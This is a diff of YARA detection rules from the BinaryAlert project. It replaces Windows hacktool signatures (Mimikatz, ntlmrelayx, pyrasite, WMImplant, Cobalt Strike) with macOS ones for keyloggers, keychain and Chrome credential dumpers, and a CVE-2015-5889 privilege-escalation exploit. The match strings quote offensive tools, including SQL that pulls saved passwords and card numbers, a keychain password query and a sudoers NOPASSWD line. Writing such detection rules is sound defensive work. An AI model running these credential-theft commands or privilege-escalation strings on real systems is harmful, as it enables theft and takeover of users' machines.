+		hash = "5e52ce394c3be2a685dbb8f435e2f64f"
+		logic_hash = "4d4e28e0d4d97412a9129a4abfadc130a464a2ababf46ca8f366a2a30b262261"
 		score = 75
-		quality = 80
+		quality = 50
 		tags = ""
 
 	strings:
-		$s1 = "Poison all requests with another IP address than Responder's one." fullword ascii wide
-		$s2 = "Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned." fullword ascii wide
-		$s3 = "Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network." fullword ascii wide
-		$s4 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide
-		$s5 = "Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)" fullword ascii wide
-		$s6 = "31mOSX detected, -i mandatory option is missing" fullword ascii wide
-		$s7 = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query." fullword ascii wide
+		$a1 = "signons.sqlite" nocase wide ascii
+		$a2 = "signons.txt" nocase wide ascii
+		$a3 = "signons2.txt" nocase wide ascii
+		$a4 = "signons3.txt" nocase wide ascii
+		$a5 = "WininetCacheCredentials" nocase wide ascii
+		$a6 = "moz_logins" nocase wide ascii
+		$a7 = "encryptedPassword" nocase wide ascii
+		$a8 = "FlashFXP" nocase wide ascii
+		$a9 = "BulletProof" nocase wide ascii
+		$a10 = "CuteFTP" nocase wide ascii
 
 	condition:
-		any of them
+		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Multi_Ntlmrelayx
+rule BINARYALERT_Hacktool_Macos_Keylogger_Caseyscarborough
 {
 	meta:
-		description = "No description has been set in the source file - BinaryAlert"
+		description = "A simple and easy to use keylogger for macOS."
 		author = "@mimeframe"
-		id = "7e0bc28f-9cb7-5c09-aedc-d95af23454aa"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ntlmrelayx.yara#L1-L15"
+		id = "82d9ff7e-b475-5888-82e1-f65c286a9cde"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/caseyscarborough/keylogger"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_caseyscarborough.yara#L1-L14"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "0d5d2d38866eb243e1803c456944e887d9d3920c54b15fd658bf90831fd87bfa"
+		logic_hash = "d97fbfefe027a26ec998743b811734e62423e8a5ba4e11d516dcfc9e4831d296"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Started interactive SMB client shell via TCP" wide ascii
-		$a2 = "Service Installed.. CONNECT!" wide ascii
-		$a3 = "Done dumping SAM hashes for host:" wide ascii
-		$a4 = "DA already added. Refusing to add another" wide ascii
-		$a5 = "Domain info dumped into lootdir!" wide ascii
+		$a1 = "/var/log/keystroke.log" wide ascii
+		$a2 = "ERROR: Unable to create event tap." wide ascii
+		$a3 = "Keylogging has begun." wide ascii
+		$a4 = "ERROR: Unable to open log file. Ensure that you have the proper permissions." wide ascii
 
 	condition:
-		any of ( $a* )
+		2 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Multi_Bloodhound_Owned
+rule BINARYALERT_Hacktool_Macos_N0Fate_Chainbreaker
 {
 	meta:
-		description = "Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains"
-		author = "@fusionrace"
-		id = "4d458339-6589-5094-8c23-1ad2baee19f1"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/porterhau5/BloodHound-Owned/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_bloodhound_owned.yara#L1-L20"
+		description = "chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner."
+		author = "@mimeframe"
+		id = "565d31c6-8d80-534d-8acc-c01d7af4f8b3"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/n0fate/chainbreaker"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_n0fate_chainbreaker.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "01ef15a3cd606c46dacb0f22477fe97f94e212a38af1cd5bdd7eb11efe8144dd"
+		logic_hash = "7aedf952756ed2375ff171329179f14a8cdc37ada69e1f003def1f1de5bc1691"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "Find all owned Domain Admins" fullword ascii wide
-		$s2 = "Find Shortest Path from owned node to Domain Admins" fullword ascii wide
-		$s3 = "List all directly owned nodes" fullword ascii wide
-		$s4 = "Set owned and wave properties for a node" fullword ascii wide
-		$s5 = "Find spread of compromise for owned nodes in wave" fullword ascii wide
-		$s6 = "Show clusters of password reuse" fullword ascii wide
-		$s7 = "Something went wrong when creating SharesPasswordWith relationship" fullword ascii wide
-		$s8 = "reference doc of custom Cypher queries for BloodHound" fullword ascii wide
-		$s9 = "Created SharesPasswordWith relationship between" fullword ascii wide
-		$s10 = "Skipping finding spread of compromise due to" fullword ascii wide
+		$a1 = "[!] Private Key Table is not available" wide ascii
+		$a2 = "[!] Public Key Table is not available" wide ascii
+		$a3 = "[-] Decrypted Private Key" wide ascii
 
 	condition:
-		any of them
+		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Multi_Pyrasite_Py
+rule BINARYALERT_Hacktool_Macos_Keylogger_Dannvix
 {
 	meta:
-		description = "A tool for injecting arbitrary code into running Python processes."
-		author = "@fusionrace"
-		id = "0acd0044-a41c-5e9e-bb94-301cd704cf9d"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/lmacken/pyrasite"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_pyrasite_py.yara#L1-L24"
+		description = "A simple keylogger for macOS."
+		author = "@mimeframe"
+		id = "598d6dbc-540d-5f96-8bd1-c15e6194012e"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/dannvix/keylogger-osx"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_dannvix.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "7f3f3df5bd5c1bee2d85ff97878ad36223ab743926a5f8f1c079b039f724abc9"
+		logic_hash = "95d0540b1308caf3e7287c70a759954650220192800c0154d225bcb01ed55766"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "WARNING: ptrace is disabled. Injection will not work." fullword ascii wide
-		$s2 = "A payload that connects to a given host:port and receives commands" fullword ascii wide
-		$s3 = "A reverse Python connection payload." fullword ascii wide
-		$s4 = "pyrasite - inject code into a running python process" fullword ascii wide
-		$s5 = "The ID of the process to inject code into" fullword ascii wide
-		$s6 = "This file is part of pyrasite." fullword ascii wide
-		$s7 = "https://github.com/lmacken/pyrasite" fullword ascii wide
-		$s8 = "Setup a communication socket with the process by injecting" fullword ascii wide
-		$s9 = "a reverse subshell and having it connect back to us." fullword ascii wide
-		$s10 = "Write out a reverse python connection payload with a custom port" fullword ascii wide
-		$s11 = "Wait for the injected payload to connect back to us" fullword ascii wide
-		$s12 = "PyrasiteIPC" fullword ascii wide
-		$s13 = "A reverse Python shell that behaves like Python interactive interpreter." fullword ascii wide
-		$s14 = "pyrasite cannot establish reverse" fullword ascii wide
+		$a1 = "/var/log/keystroke.log" wide ascii
+		$a2 = "<forward-delete>" wide ascii
+		$a3 = "<unknown>" wide ascii
 
 	condition:
-		any of them
+		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Wmi_Implant
+rule BINARYALERT_Hacktool_Macos_Manwhoami_Osxchromedecrypt
 {
 	meta:
-		description = "A PowerShell based tool that is designed to act like a RAT"
-		author = "@fusionrace"
-		id = "cd90ef31-6e15-5518-8278-98e99e379916"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_wmi_implant.yara#L1-L21"
+		description = "Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X."
+		author = "@mimeframe"
+		id = "874cc999-d9c2-5017-83ec-e4be8a659476"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/manwhoami/OSXChromeDecrypt"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_osxchromedecrypt.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "8b02fd265b04b9675a99b9638fdd179c8a86ed3afd7506195f3d3dcb2417d74d"
+		logic_hash = "0974c6a5e7875e20380df0f58bf22a589b9a5c718e635ec77b42060abcf99473"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "This really isn't applicable unless you are using WMImplant interactively." fullword ascii wide
-		$s2 = "What command do you want to run on the remote system? >" fullword ascii wide
-		$s3 = "Do you want to [create] or [delete] a string registry value? >" fullword ascii wide
-		$s4 = "Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >" fullword ascii wide
-		$s5 = "What is the name of the service you are targeting? >" fullword ascii wide
-		$s6 = "This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine" fullword ascii wide
-		$s7 = "gen_cli - Generate the CLI command to execute a command via WMImplant" fullword ascii wide
-		$s8 = "exit - Exit WMImplant" fullword ascii wide
-		$s9 = "Lateral Movement Facilitation" fullword ascii wide
-		$s10 = "vacant_system - Determine if a user is away from the system." fullword ascii wide
-		$s11 = "Please provide the ProcessID or ProcessName flag to specify the process to kill!" fullword ascii wide
+		$a1 = "Credit Cards for Chrome Profile" wide ascii
+		$a2 = "Passwords for Chrome Profile" wide ascii
+		$a3 = "Unknown Card Issuer" wide ascii
+		$a4 = "ERROR getting Chrome Safe Storage Key" wide ascii
+		$b1 = "select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards" wide ascii
+		$b2 = "select username_value, password_value, origin_url, submit_element from logins" wide ascii
 
 	condition:
-		any of them
+		3 of ( $a* ) or all of ( $b* )
 }
-rule BINARYALERT_Hacktool_Windows_Mimikatz_Sekurlsa
+rule BINARYALERT_Hacktool_Macos_Keylogger_Skreweverything_Swift
 {
 	meta:
-		description = "Mimikatz credential dump tool"
-		author = "@fusionrace"
-		id = "08fe62c5-f7a4-5985-a298-1d3c2c1744d4"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/gentilkiwi/mimikatz"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_sekurlsa.yara#L1-L18"
+		description = "It is a simple and easy to use keylogger for macOS written in Swift."
+		author = "@mimeframe"
+		id = "a4918bc3-d3f0-59f4-894f-fd34ee944fac"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/SkrewEverything/Swift-Keylogger"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_skreweverything_swift.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "24e958c3cbda8e01dc2d84b3059114ea23f4b38db1676f7b72e5eabfa52b7335"
+		logic_hash = "f400b8ec392417e7443e82a2c2a9adfc868b9795aa1fb29f91d228f6f94efd13"
 		score = 75
 		quality = 80
 		tags = ""
-		SHA256_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
-		SHA256_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$s1 = "dpapisrv!g_MasterKeyCacheList" fullword ascii wide
-		$s2 = "lsasrv!g_MasterKeyCacheList" fullword ascii wide
-		$s3 = "!SspCredentialList" ascii wide
-		$s4 = "livessp!LiveGlobalLogonSessionList" fullword ascii wide
-		$s5 = "wdigest!l_LogSessList" fullword ascii wide
-		$s6 = "tspkg!TSGlobalCredTable" fullword ascii wide
+		$a1 = "Can't create directories!" wide ascii
+		$a2 = "Can't create manager" wide ascii
+		$a3 = "Can't open HID!" wide ascii
+		$a4 = "PRINTSCREEN" wide ascii
+		$a5 = "LEFTARROW" wide ascii
 
 	condition:
-		all of them
+		4 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Rdp_Cmd_Delivery
+rule BINARYALERT_Hacktool_Macos_Manwhoami_Mmetokendecrypt
 {
 	meta:
-		description = "Delivers a text payload via RDP (rubber ducky)"
-		author = "@fusionrace"
-		id = "8d035721-34ee-566f-8851-1c9501de2704"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_rdp_cmd_delivery.yara#L1-L14"
+		description = "This program decrypts / extracts all authorization tokens on macOS / OS X / OSX."
+		author = "@mimeframe"
+		id = "2dc01ff3-4c4a-548d-b2f0-b36897ad6a5c"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/manwhoami/MMeTokenDecrypt"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_mmetokendecrypt.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "98bc02bb651fba069828b5960ee47542828f0d530e5e280b15abb0573b8e0168"
+		logic_hash = "ccfedfbff0c6eefe41e80fe488d4cae928a33e7b86019c6ec54d1c9005b35147"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "Usage: rdp-cmd-delivery.sh OPTIONS" ascii wide
-		$s2 = "[--tofile 'c:\\test.txt' local.ps1 #will copy contents of local.ps1 to c:\\test.txt" ascii wide
-		$s3 = "-cmdfile local.bat                #will execute everything from local.bat" ascii wide
-		$s4 = "To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console" ascii wide
+		$a1 = "security find-generic-password -ws 'iCloud'" wide ascii
+		$a2 = "ERROR getting iCloud Decryption Key" wide ascii
+		$a3 = "Could not find MMeTokenFile. You can specify the file manually." wide ascii
+		$a4 = "Decrypting token plist ->" wide ascii
+		$a5 = "Successfully decrypted token plist!" wide ascii
 
 	condition:
-		any of them
+		3 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Hot_Potato
+rule BINARYALERT_Hacktool_Macos_Exploit_Cve_5889
 {
 	meta:
 		description = "No description has been set in the source file - BinaryAlert"
 		author = "@mimeframe"
-		id = "dee13640-b4a9-5a39-af01-338c0197c995"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/foxglovesec/Potato"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_hot_potato.yara#L1-L15"
+		id = "ea70d31c-1b70-5927-ba8d-e13d2114e74e"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://www.exploit-db.com/exploits/38371/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_cve_2015_5889.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "1ccee61660b3478294a5a4e1ca2b16c91156f6c877d0f83848cccd18a3f753f7"
+		logic_hash = "b455759ea369cdcf2f05a2735a38000179ebe644667016cd635dfad9beda4459"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Parsing initial NTLM auth..." wide ascii
-		$a2 = "Got PROPFIND for /test..." wide ascii
-		$a3 = "Starting NBNS spoofer..." wide ascii
-		$a4 = "Exhausting UDP source ports so DNS lookups will fail..." wide ascii
-		$a5 = "Usage: potato.exe -ip" wide ascii
+		$a1 = "/etc/sudoers" fullword wide ascii
+		$a2 = "/etc/crontab" fullword wide ascii
+		$a3 = "* * * * * root echo" wide ascii
+		$a4 = "ALL ALL=(ALL) NOPASSWD: ALL" wide ascii
+		$a5 = "/usr/bin/rsh" fullword wide ascii
+		$a6 = "localhost" fullword wide ascii
 
 	condition:
-		any of ( $a* )
+		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Ncc_Wmicmd
+rule BINARYALERT_Hacktool_Macos_Keylogger_Eldeveloper_Keystats
 {
 	meta:
-		description = "Command shell wrapper for WMI"
+		description = "A simple keylogger for macOS."
 		author = "@mimeframe"
-		id = "18bc36f7-b97a-5bce-a68b-c349713e9468"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/nccgroup/WMIcmd"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_ncc_wmicmd.yara#L1-L18"
+		id = "7fddb502-ae2d-5e14-95f5-115498fa5926"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/ElDeveloper/keystats"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_eldeveloper_keystats.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "bef6828a706dcfc3b573523fccd391a5ef3fa505235b1621a82527d64d32aaf0"
+		logic_hash = "c73f5ca2ba0a1bde7c1f9b96173938e40511e12f875c4d850d6d498c63e89385"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Need to specify a username, domain and password for non local connections" wide ascii
-		$a2 = "WS-Management is running on the remote host" wide ascii
-		$a3 = "firewall (if enabled) allows connections" wide ascii
-		$a4 = "WARNING: Didn't see stdout output finished marker - output may be truncated" wide ascii
-		$a5 = "Command sleep in milliseconds - increase if getting truncated output" wide ascii
-		$b1 = "0x800706BA" wide ascii
-		$b2 = "NTLMDOMAIN:" wide ascii
-		$b3 = "cimv2" wide ascii
+		$a1 = "YVBKeyLoggerPerishedNotification" wide ascii
+		$a2 = "YVBKeyLoggerPerishedByLackOfResponseNotification" wide ascii
+		$a3 = "YVBKeyLoggerPerishedByUserChangeNotification" wide ascii
 
 	condition:
-		any of ( $a* ) or all of ( $b* )
+		2 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Moyix_Creddump
+rule BINARYALERT_Hacktool_Macos_Keylogger_Giacomolaw
 {
 	meta:
-		description = "creddump is a python tool to extract credentials and secrets from Windows registry hives."
+		description = "A simple keylogger for macOS."
 		author = "@mimeframe"
-		id = "46df781a-abab-5593-99f9-1a6b993904cb"
+		id = "81fcf792-a0a9-5b97-a71c-4c517a7b910c"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/moyix/creddump"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_moyix_creddump.yara#L1-L16"
+		reference = "https://github.com/GiacomoLaw/Keylogger"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_giacomolaw.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "3f2f4c5069fcb3d3b1d293a471bcf9489f058f27cd385885ab2bb4f719a3bd9d"
+		logic_hash = "45ca583c07b8593ed716306ae6f80eef1c3fc5652aed739454fa8007fae929b4"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%" wide ascii
-		$a2 = "0123456789012345678901234567890123456789" wide ascii
-		$a3 = "NTPASSWORD" wide ascii
-		$a4 = "LMPASSWORD" wide ascii
-		$a5 = "aad3b435b51404eeaad3b435b51404ee" wide ascii
-		$a6 = "31d6cfe0d16ae931b73c59d7e0c089c0" wide ascii
+		$a1 = "ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions." wide ascii
+		$a2 = "ERROR: Unable to create event tap." wide ascii
+		$a3 = "Keystrokes are now being recorded" wide ascii
 
 	condition:
-		all of ( $a* )
+		2 of ( $a* )
 }
-
-rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Artifact_Exe : FILE
+rule BINARYALERT_Hacktool_Macos_Manwhoami_Icloudcontacts
 {
 	meta:
-		description = "Detection of the Artifact payload from Cobalt Strike"
-		author = "@javutin, @joseselvi"
-		id = "ca92eea2-ad19-56df-af73-bebfc3690377"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "https://www.cobaltstrike.com/help-artifact-kit"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_artifact.yara#L6-L17"
+		description = "Pulls iCloud Contacts for an account. No dependencies. No user notification."
+		author = "@mimeframe"
+		id = "b6595540-7f89-5764-b34e-d32c1a377b6c"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/manwhoami/iCloudContacts"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_icloudcontacts.yara#L1-L14"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f2f3b9936041cb4bb4b5613d2522553b9835704e1be52993e757fc0edbdd7871"
+		logic_hash = "0c5b81454b26de91f5ad126b24f10397e1da5d8561b0bf22c5df128753df0ac2"
 		score = 75
-		quality = 55
-		tags = "FILE"
+		quality = 80
+		tags = ""
+
+	strings:
+		$a1 = "https://setup.icloud.com/setup/authenticate/" wide ascii
+		$a2 = "https://p04-contacts.icloud.com/" wide ascii
+		$a3 = "HTTP Error 401: Unauthorized. Are you sure the credentials are correct?" wide ascii
+		$a4 = "HTTP Error 404: URL not found. Did you enter a username?" wide ascii
 
 	condition:
-		BINARYALERT_Cobaltstrike_Template_Exe_PRIVATE and filesize < 100KB and pe.sections [ pe.section_index ( ".data" ) ] . raw_data_size > 512 and math.entropy ( pe.sections [ pe.section_index ( ".data" ) ] . raw_data_offset , 512 ) >= 7
+		3 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Mimikatz_Errors
+rule BINARYALERT_Hacktool_Macos_Juuso_Keychaindump
 {
 	meta:
-		description = "Mimikatz credential dump tool: Error messages"
-		author = "@fusionrace"
-		id = "94d50739-fc84-5bfe-821d-5e2851f681e3"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/gentilkiwi/mimikatz"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_errors.yara#L1-L16"
+		description = "For reading OS X keychain passwords as root."
+		author = "@mimeframe"
+		id = "10ee6c24-db35-5178-9a40-92f5231948aa"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/juuso/keychaindump"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_juuso_keychaindump.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "60fb94b9465b19af3b2df1b26490d4ac19a31a39f2f8c52f1059d37843769b36"
+		logic_hash = "dd2fb6249fe4b7381e734ea3a308158159f7e79b39ba5c970241dcd66436d669"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
-		md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$s1 = "[ERROR] [LSA] Symbols" fullword ascii wide
-		$s2 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii wide
-		$s3 = "[ERROR] [CRYPTO] Symbols" fullword ascii wide
-		$s4 = "[ERROR] [CRYPTO] Init" fullword ascii wide
+		$a1 = "[-] Too many candidate keys to fit in memory" wide ascii
+		$a2 = "[-] Could not allocate memory for key search" wide ascii
+		$a3 = "[-] Too many credentials to fit in memory" wide ascii
+		$a4 = "[-] The target file is not a keychain file" wide ascii
+		$a5 = "[-] Could not find the securityd process" wide ascii
+		$a6 = "[-] No root privileges, please run with sudo" wide ascii
 
 	condition:
-		all of them
+		4 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Mimikatz_Files
+rule BINARYALERT_Hacktool_Macos_Keylogger_B4Rsby_Swiftlog
 {
 	meta:
-		description = "Mimikatz credential dump tool: Files"
-		author = "@fusionrace"
-		id = "ea4fd443-64dd-5466-8525-40c3a023e229"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/gentilkiwi/mimikatz"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_files.yara#L1-L15"
+		description = "Dirty user level command line keylogger hacked together in Swift."
+		author = "@mimeframe"
+		id = "b1ae8284-04a0-5818-9997-0e31eb51ed2b"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/b4rsby/SwiftLog"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_b4rsby_swiftlog.yara#L1-L11"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "50d23cda49ca559da2e504e53b46b58679ea8bc07c501ff7764a3d142598adc8"
+		logic_hash = "c66dcab2da0e543198f97ca104c13533c8950d10b6f7cbd3f906348d0f8c45ff"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
-		md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$s1 = "kiwifilter.log" fullword wide
-		$s2 = "kiwissp.log" fullword wide
-		$s3 = "mimilib.dll" fullword ascii wide
+		$a1 = "You need to enable the keylogger in the System Prefrences" wide ascii
 
 	condition:
-		any of them
+		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Mimikatz_Copywrite
+rule BINARYALERT_Hacktool_Macos_Macpmem
 {
 	meta:
-		description = "Mimikatz credential dump tool: Author copywrite"
-		author = "@fusionrace"
-		id = "bf7a52b5-c0af-5805-a2da-41ae3842e0c6"
+		description = "MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers."
+		author = "@mimeframe"
+		id = "4890598e-936c-5a4d-9004-88ff4fe57c49"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/gentilkiwi/mimikatz"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_copywrite.yara#L1-L24"
+		reference = "https://github.com/google/rekall/tree/master/tools/osx/MacPmem"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_macpmem.yara#L3-L22"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f0e8a8b0c7398e7af06bd074eec0433265ba0e675bdbff354e59432c246b0b36"
+		logic_hash = "d64b5a5423932211e3b72d949028f3f0ed1f1435e9584cffa947f2bd4846c29b"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8"
